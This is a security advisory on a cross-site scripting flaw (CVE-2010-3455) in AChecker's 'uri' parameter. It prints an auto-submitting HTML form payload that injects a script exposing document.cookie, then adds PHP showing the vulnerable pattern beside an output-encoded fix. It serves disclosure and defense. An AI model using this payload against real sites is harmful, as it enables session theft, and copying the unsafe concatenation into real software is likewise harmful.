High-Tech Bridge (htbridge) advisory HTB22601
Sep 01, 2010 - 12:00 a.m.

Cross-site Scripting (XSS) Vulnerability in AChecker

High-Tech Bridge, www.htbridge.com
EPSS: 0.002 (Low), percentile 60.4%

High-Tech Bridge SA Security Research Lab has discovered a vulnerability in AChecker that could be exploited to perform cross-site scripting attacks.

  1. Cross-site scripting (XSS) vulnerability in AChecker: CVE-2010-3455
    The vulnerability exists due to an input sanitization error in the "uri" parameter in index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
    Exploitation example:
    <form action="http://host/index.php" method="post" name="main" enctype="multipart/form-data" >
    <input type="hidden" name="uri" value='http://1"><script>alert(document.cookie)</script>' />
    <input type="hidden" name="validate_uri" value="Check It" />
    <input type="hidden" name="MAX_FILE_SIZE" value="52428800" />
    <input type="hidden" name="uploadfile"; filename="" />
    <input type="hidden" name="gid[]" value="8" />
    </form>
    <script>
    document.main.submit();
    </script>
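
The payload above closes a double-quoted attribute with `">`. The following is an added example, not code from the advisory or from AChecker: it assumes index.php reflects "uri" into such an attribute and shows that pattern beside an output-encoded version. All function names are hypothetical.

```php
<?php
// Added example, not AChecker source. Assumption: index.php writes the
// submitted "uri" back into a double-quoted HTML attribute.

// Vulnerable pattern: the raw request value is concatenated into markup.
function render_uri_field_unsafe(string $uri): string
{
    return '<input type="text" name="uri" value="' . $uri . '" />';
}

// Hardened: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid bytes.
function render_uri_field(string $uri): string
{
    $encoded = htmlspecialchars($uri, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="uri" value="' . $encoded . '" />';
}

// Defence in depth: accept only well-formed http(s) URLs for checking.
function is_acceptable_uri(string $uri): bool
{
    if (filter_var($uri, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    $scheme = strtolower((string) parse_url($uri, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true);
}

// Hypothetical request handler: encodes on every path, valid input or not.
function handle_check(array $post): string
{
    // Treat non-string input such as uri[]=... as empty.
    $uri = (isset($post['uri']) && is_string($post['uri'])) ? trim($post['uri']) : '';
    $field = render_uri_field($uri);
    if (!is_acceptable_uri($uri)) {
        return '<p class="error">Enter a valid http(s) URL.</p>' . $field;
    }
    return $field; // caller goes on to fetch and check the page at $uri
}

// Value taken from the advisory's proof of concept.
$payload = 'http://1"><script>alert(document.cookie)</script>';

echo render_uri_field_unsafe($payload), PHP_EOL; // attribute is closed early
echo handle_check(['uri' => $payload]), PHP_EOL; // value stays inside the attribute
```

URL validation alone is not sufficient, because FILTER_VALIDATE_URL can accept URLs whose path or query contains markup characters; the encoding in render_uri_field is what prevents the attribute breakout.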
CPE
Name      Operator  Version
achecker  le        1.0
